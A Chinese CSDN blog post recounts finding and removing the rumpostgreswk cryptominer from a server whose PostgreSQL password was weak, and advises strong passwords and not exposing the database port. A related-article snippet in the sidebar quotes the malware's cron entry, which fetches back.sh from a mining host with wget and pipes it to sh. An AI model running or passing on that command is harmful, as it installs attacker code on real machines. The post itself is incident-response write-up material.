rumpostgreswk 挖矿病毒程序。杀除

最新推荐文章于 2023-05-26 11:32:07 发布
最新推荐文章于 2023-05-26 11:32:07 发布
阅读量2k 收藏 3
点赞数 2
分类专栏: Linux 文章标签: Linux rumpostgreswk 挖矿程序杀除 中毒 病毒
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u012798683/article/details/121877274
版权

今天阿里云发短信,说服务器发现挖矿病毒程序。我们来看看。怎么回事。

 发现。postgres 用户启动了一个进程文件。这个文件,占用cpu非常高。就是他了。

我们来看看,他的启动路径在哪里?

发现。tmp下。这个config 文件,有问题。并不是postgres 的程序。

./postgres_dm
/tmp/rumpostgreswk --config=/tmp/config.json

发现这两个文件。就是病毒。

找到对应的路径。在/tmp下面。

发现这个文件夹里面很多都是异常文件。

清理处理掉这些异常文件。

kill -9 查杀掉对应的挖矿程序。

设置postgres 复杂密码。OK。

分析:

分析原因,因为postgres 的用户名和密码非常简单。估计多半是被破解了。然后以postgres 用户运行了挖矿程序。且pg端口被暴露在公网上。导致中招。

尽可能,设置复杂的postgres 密码。尽量不要将pg端口暴露在公网上。

杀除后,CPU恢复正常。没有被高占用了。

成都-Python开发-王帅
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
rumpostgreswk 挖矿病毒程序
qq_44122254的博客
03-16 1974
朋友说他的服务器发消息有挖矿,拍完快照,给我说练练手,这算是我第一次接触挖矿 信息提示在tmp文件夹下面,进入打开进行查看,看到了提示的挖矿病毒程序 在此,同时看一下CPU的占用情况 原来学的linux操作命令,全都还给老师了,这次又现学了一下,如何查看内存的使用情况 查看内存的使用情况 Top PID:进程的ID USER:进程所有者 PR:进程的优先级别,越小越优先被执行 NI:进程Nice值,代表这个进程的优先值 VIRT:进程占用的虚拟内存 RES:进程占用的物理内存 SHR:进程使用的共享内
记一次公网postgresql数据库服务器被入侵为矿机的定位过程
萝卜吃鱼914的博客
09-26 2763
今天中午群里有一个群友反馈pg服务器cpu使用率高达1700%,处于好奇自己就帮着他一起定位了一下问题,以下记录一下定位问题的过程方便以后做复盘管理! 现象截图如下: 一、查看cpu情况和服务器平均负载情况得知各个cpu的使用率并不是很高呀,为什么执行top命令看到postgresql进程的cpu使用是1700%呢?没有头绪我们继续往下看 二、查看一下服务器的负载情况呢 有问题了,你服务...
消灭Linux挖矿病毒rumpostgreswk
BIG BOSS的博客
09-09 3467
病毒定时任务 sudo crontab -u postgres -l [root@master ~]# sudo crontab -u postgres -l */30 * * * * /home/postgres//home/postgres/data/./oka * */6 * * * wget -q -O- http://xmr.linux1213.ru:2019/back.sh | sh 删除 sudo crontab -u postgres -r
【问题记录】postgreSQL使用默认密码导致kdevtmpfsi挖矿病毒注入
最新发布
UncleDong的博客
05-26 1694
3.分别kill 掉这两个进程,一定要两个都kill掉,刚开始处理的时候只kill了主进行,没有处理守护进程,导致一会又挖矿机器> 又启动开始工作,cpu 又跑到100%6.使用lsof查看该进程存在异常IP连接,比如:45.129.2.107,在服务器安全组中将该IP禁用,并重启服务器。7.最后,一定要重置系统上的所有用户密码,检查服务安全组,尤其是远程端口!由于该挖矿任务是个常见任务,因此网上很多教程,我参考的是。服务器不同,可能路径不同,可以直接用命令查找。,发现host被篡改,删除即可。
Centos7安装Postgresql
又又爱吃肉的博客
05-24 1325
1、打开:https://www.postgresql.org/download/linux/redhat/ 生成下面两句安装语句,分别在linux中执行 #通过RPM下载安装包: sudo yum install -y https://download.postgresql.org/pub/repos/yum/reporpms/EL-7-x86_64/pgdg-redhat-repo-latest.noarch.rpm #安装PostgreSQL: sudo yum install -...
postgresql
wk022的专栏
09-11 388
postgresql初始用户 postgres 没有密码 通过以下命令登录 $ sudo -u postgres psql 设置密码 \password Enter password: ... ... 删除数据库 drop DATABASE ambari
Postgresql RUM索引
魂醉的一亩二分地
03-04 1263
RUM 为了全文搜索更加快,RUM索引可以看做是在GIN基础上的扩展。可以从https://github.com/postgrespro/rum下载使用。 使用GIN索引的一些限制 GIN索引允许使用tsvector和tsquery类型执行快速的全文本搜索。但是,使用GIN索引进行全文搜索存在几个问题: 排序慢。需要有关词汇的位置信息才能进行排序。 GIN索引不存储词素的位置信息。因此,在索引扫...
一次服务器被挖矿的处理解决过程
weixin_34228387的博客
07-28 1736
内网一台服务器cpu爆满,第6感猜测中了挖矿病毒,以下为cpu爆满监控图表赶紧ssh进系统,top了下,一个./x3e536747 进程占用了大量的cpu,cpu load average超过了cpu内核数,先kill掉进程,不用猜,等会肯定会继续启动,检查开放端口,发现postgresql直接对外开放的。肯定是通过这个入口***进来的;暂时关闭外网pg 5432端口;找到挖矿执行路径,都在/tm...
记一次处理挖矿程序引发的postgres 连接超时
奔跑的痕迹的博客
12-26 1501
进入服务使用top 查看cpu 使用情况 使用 ll /proc/pid号 查找进程 也可以使用 lsof ps 进程名称(有的linux 需要先安装yam install lsof) 首选我的postgres是使用docker 制作的一个容器,所以先要进入这个容器 *docker exec -it 容器id /bin/bash 进入容器后在登录postgres root@f82e7d3a9755:/# su postgres postgres@f82e7d3a9755:/$ psql 然后使用
记一次服务器清除挖矿木马操作记录
skyfans的博客
12-24 1942
突然接到服务器告警,一台服务器的CPU已经达到了3000%,不用想,肯定是中了木马了,这完全论为了矿机了。问了一堆公司的安全砖家,都说没的救了,需要重新做系统了,但是和开发对接了下,这台服务器上存在众多重要的程序内容,无法直接重装操作系统。。。 这特么不是围栏老子呢吗? 好吧,抱着试一试的态度,我们来试一哈解决处理下吧。 1.查看现象 top 可以看到,一个进程2N6f1P,狠占CPU,占到...
# 记一次自己云主机挖矿病毒排查过程
whj_study的博客
02-24 4464
这台云主机过年回家有段时间没用了。然后上去使用的时候很卡,top看了一下 这挖矿病毒把我cpu被吃光了,,, 执行命令`netstat -antlp | grep kswapd0` 查询该进程的网络信息 连接了一个荷兰的ip 找一下哪里存在这个文件`find / -name kswapd0` 或者看一下起这个进程的文件在哪里也能找到 `ls -l /proc/1559/exe` 进到这个目录看一下,病毒程序的文件目录,其中的kswapd0就是主体,另外还包含了创建计划..
服务器安全警告处理(查找挖矿病毒的方法)
名猿妮的博客
04-23 1291
服务器安全警告处理(查找挖矿病毒的方法) 方法一 查找进程并强制杀死相应的进程 ps -aux | grep kinsing ps -aux | grep kdevtmpfsi 查找病毒文件kinsing kdevtmpfsi find / -name kinsing find / -name kdevtmpfsi 查看周期任务cron,不一定在root用户下,有可能在postgres(数据库),docker(容器),PHPTest(PHP单元测试) cd /var/spool/
PostgreSQL 设计优化case - 大宽表任意字段组合查询索引如何选择(btree, gin, rum) - (含单个索引列数...
weixin_34279061的博客
04-14 1076
标签 PostgreSQL , adhoc查询 , 大宽表 , 任意字段组合查询 , 索引 , btree , gin , rum 背景 大宽表,任意字段组合查询,透视。是实时分析系统中的常见需求: 1、实时写入。 2、实时任意字段组合查询、透视。 PostgreSQL中,有多种方法支持这种场景: 《PostgreSQL 9种索引的原理和应用场景》 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

成都-Python开发-王帅

你的鼓励是我创作的最大动力。

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值